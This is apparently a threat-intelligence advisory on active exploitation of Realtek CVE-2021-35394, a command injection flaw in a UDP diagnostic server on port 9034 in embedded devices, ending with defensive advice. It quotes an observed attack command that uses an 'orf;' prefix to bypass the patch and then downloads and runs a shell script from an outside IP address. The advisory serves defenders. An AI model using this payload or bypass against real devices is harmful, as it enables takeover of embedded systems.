Researchers at Juniper Threat Labs have found that threat actors are actively exploiting Realtek CVE-2021-35394, disclosed last week. The attacks specifically target the Realtek RTL8xxx SoC chipsets used in embedded devices. The vulnerable component is a UDP server (the MP Daemon diagnostic tool, usually compiled as the UDPServer binary) listening on port 9034, which allows an unauthenticated remote attacker to inject and execute arbitrary shell commands. The issue was patched, but the fix was easily circumvented by prepending "orf;" to any injected command string:
Exploits require only a single UDP packet from the attacker. Each observed variant of this attack follows the same steps. First, the attackers use the open UDP server to inject a shell command:
[Figure: UDP packet sent by attacker]
The injected command, seen in the data field above, is:
orf;cd /tmp||cd /var&&busybox wget hxxp://45[.]61.188.184/f.sh -O b.sh&&sh b.sh;#
The Realtek Jungle SDK (v2.x up to v3.4.14B) ships the MP Daemon diagnostic tool, usually compiled as the UDPServer binary, which is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability. By sending a specially crafted UDP request, a remote unauthenticated attacker can exploit the command injection to execute arbitrary commands on the device.
Block all threat indicators at your respective controls.
Search for IOCs in your environment.
For CVE-2021-35394, follow the link to the patch.